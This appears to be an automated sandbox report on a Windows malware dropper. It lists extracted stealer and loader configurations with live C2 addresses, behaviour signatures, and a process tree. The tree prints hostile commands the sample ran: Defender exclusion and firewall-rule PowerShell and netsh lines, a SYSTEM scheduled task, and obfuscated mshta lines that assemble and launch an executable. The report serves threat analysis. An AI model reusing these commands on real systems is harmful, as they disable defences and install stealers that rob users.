Analysis
-
max time kernel
179s -
max time network
196s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
09-11-2021 13:19
General
-
Target
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
-
Size
403KB
-
MD5
f957e397e71010885b67f2afe37d8161
-
SHA1
a8bf84b971b37ac6e7f66c5e5a7e971a7741401e
-
SHA256
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66
-
SHA512
8b5e9cb926fafc295c403c1fce7aa883db3a327e58c3295e9a081a8937bed28e305cca08c2c7d98080818095ea99bb4047e10aa2f61e3e4d6d965aef6d16a4f6
Score
10/10
Malware Config
Extracted
Family
socelars
C2
http://www.hhgenice.top/
Extracted
Family
xloader
Version
2.5
Campaign
s0iw
C2
http://www.kyiejenner.com/s0iw/
Decoy
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
Extracted
Family
vidar
Version
48.1
Botnet
937
Attributes
-
profile_id
937
Extracted
Family
redline
Botnet
20kinstallov
C2
95.217.123.66:57358
Extracted
Family
redline
Botnet
leyla01
C2
135.181.129.119:4805
Signatures
-
Arkei
Arkei is an infostealer written in C++.
-
Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Xloader
Xloader is a rebranded version of Formbook malware.
-
Arkei Stealer Payload 1 IoCs
-
Vidar Stealer 2 IoCs
-
Xloader Payload 3 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 11 IoCs
-
Modifies Windows Firewall 1 TTPs
-
VMProtect packed file 5 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 7 IoCs
Detects Themida, an advanced Windows software protection system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
-
NSIS installer 4 IoCs
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Kills process with taskkill 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of WriteProcessMemory 49 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\kJAiegdJV52eakxk4H71IERT.exe"C:\Users\Admin\Pictures\Adobe Films\kJAiegdJV52eakxk4H71IERT.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Pictures\Adobe Films\VKUL1QKxx3FfhwyLaFAevQQv.exe"C:\Users\Admin\Pictures\Adobe Films\VKUL1QKxx3FfhwyLaFAevQQv.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\BCjyYkZhSaWCNQ848nNg_MTK.exe"C:\Users\Admin\Pictures\Adobe Films\BCjyYkZhSaWCNQ848nNg_MTK.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\ASX2J6XR6VcCJALEPwk0xI7g.exe"C:\Users\Admin\Pictures\Adobe Films\ASX2J6XR6VcCJALEPwk0xI7g.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\UCMsHFrnjWylOgkD2gotC8wi.exe"C:\Users\Admin\Pictures\Adobe Films\UCMsHFrnjWylOgkD2gotC8wi.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1048 -s 4803⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\5pjzcxpjPccaqvOmvhKg96Mb.exe"C:\Users\Admin\Pictures\Adobe Films\5pjzcxpjPccaqvOmvhKg96Mb.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\ytkhCN6JLx4N1E3xVUvIoLdz.exe"C:\Users\Admin\Pictures\Adobe Films\ytkhCN6JLx4N1E3xVUvIoLdz.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\RKy5M9ft0KPEJKcxSR6yJmZv.exe"C:\Users\Admin\Pictures\Adobe Films\RKy5M9ft0KPEJKcxSR6yJmZv.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\RKy5M9ft0KPEJKcxSR6yJmZv.exe"C:\Users\Admin\Pictures\Adobe Films\RKy5M9ft0KPEJKcxSR6yJmZv.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\jy97tKz1EGXlRrKdjp4F77Gm.exe"C:\Users\Admin\Pictures\Adobe Films\jy97tKz1EGXlRrKdjp4F77Gm.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\jy97tKz1EGXlRrKdjp4F77Gm.exe"C:\Users\Admin\Pictures\Adobe Films\jy97tKz1EGXlRrKdjp4F77Gm.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\6pYj2NwVzYBkdkS1QKek_Du9.exe"C:\Users\Admin\Pictures\Adobe Films\6pYj2NwVzYBkdkS1QKek_Du9.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\2pXge7qIETCTM4QEr2bwU2BJ.exe"C:\Users\Admin\Pictures\Adobe Films\2pXge7qIETCTM4QEr2bwU2BJ.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "2pXge7qIETCTM4QEr2bwU2BJ.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\2pXge7qIETCTM4QEr2bwU2BJ.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "2pXge7qIETCTM4QEr2bwU2BJ.exe" /f4⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\qA50zNX8F_sk0MDiW_qoyLQk.exe"C:\Users\Admin\Pictures\Adobe Films\qA50zNX8F_sk0MDiW_qoyLQk.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\PKrWcSBb0lI1DmCM8Uazla6a.exe"C:\Users\Admin\Pictures\Adobe Films\PKrWcSBb0lI1DmCM8Uazla6a.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\qdNhfWqfbcRP6ol6TTp9qg2T.exe"C:\Users\Admin\Pictures\Adobe Films\qdNhfWqfbcRP6ol6TTp9qg2T.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\HPN0OZlZkxHDJ4nVV3RRxJXU.exe"C:\Users\Admin\Pictures\Adobe Films\HPN0OZlZkxHDJ4nVV3RRxJXU.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\HPN0OZlZkxHDJ4nVV3RRxJXU.exe"C:\Users\Admin\Pictures\Adobe Films\HPN0OZlZkxHDJ4nVV3RRxJXU.exe"3⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\HPN0OZlZkxHDJ4nVV3RRxJXU.exe"C:\Users\Admin\Pictures\Adobe Films\HPN0OZlZkxHDJ4nVV3RRxJXU.exe"3⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\HPN0OZlZkxHDJ4nVV3RRxJXU.exe"C:\Users\Admin\Pictures\Adobe Films\HPN0OZlZkxHDJ4nVV3RRxJXU.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\dOS75bLM6nITgXS1t5NDJalt.exe"C:\Users\Admin\Pictures\Adobe Films\dOS75bLM6nITgXS1t5NDJalt.exe"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \3⤵
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \4⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\FlLunocmOUK0TeBVp64iskW8.exe"C:\Users\Admin\Pictures\Adobe Films\FlLunocmOUK0TeBVp64iskW8.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\3R3bsuYCnEXHZiJSC5eBbt0l.exe"C:\Users\Admin\Pictures\Adobe Films\3R3bsuYCnEXHZiJSC5eBbt0l.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\H6GKqHbmsoVaHeAxtepKAW3H.exe"C:\Users\Admin\Pictures\Adobe Films\H6GKqHbmsoVaHeAxtepKAW3H.exe"2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\H6GKqHbmsoVaHeAxtepKAW3H.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\H6GKqHbmsoVaHeAxtepKAW3H.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\H6GKqHbmsoVaHeAxtepKAW3H.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\H6GKqHbmsoVaHeAxtepKAW3H.exe" ) do taskkill -im "%~NxK" -F4⤵
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\AGj4vwIAblEYt23X90XODyst.exe"C:\Users\Admin\Pictures\Adobe Films\AGj4vwIAblEYt23X90XODyst.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\AGj4vwIAblEYt23X90XODyst.exe" & exit3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 54⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mLpwtEYDwQRDqdB3lG_LiI4C.exe"C:\Users\Admin\Pictures\Adobe Films\mLpwtEYDwQRDqdB3lG_LiI4C.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\XERCOO69wcL2gkcThBKsabxV.exe"C:\Users\Admin\Pictures\Adobe Films\XERCOO69wcL2gkcThBKsabxV.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Underdress.exeC:\Users\Admin\AppData\Roaming\Underdress.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exeC:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3628 -s 5564⤵
- Program crash
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\795wN40ZuD3L70_Jbzprn0BP.exe"C:\Users\Admin\Pictures\Adobe Films\795wN40ZuD3L70_Jbzprn0BP.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\hkRBnSKTuteUQQUmGi6LGYiZ.exe"C:\Users\Admin\Pictures\Adobe Films\hkRBnSKTuteUQQUmGi6LGYiZ.exe"2⤵
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe"1⤵
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\6pYj2NwVzYBkdkS1QKek_Du9.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F3⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )2⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "H6GKqHbmsoVaHeAxtepKAW3H.exe" -F1⤵
- Kills process with taskkill
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
164KB
-
Filesize
76KB
-
Filesize
3.1MB
-
Filesize
12KB
-
Filesize
492KB
-
Filesize
864KB
-
Filesize
852KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
3.1MB
-
Filesize
476KB
-
Filesize
728KB
-
Filesize
524KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
16.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.4MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
1.3MB
-
Filesize
132KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.1MB
-
Filesize
5.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
128KB
-
Filesize
6.0MB
-
Filesize
128KB
-
Filesize
6.0MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB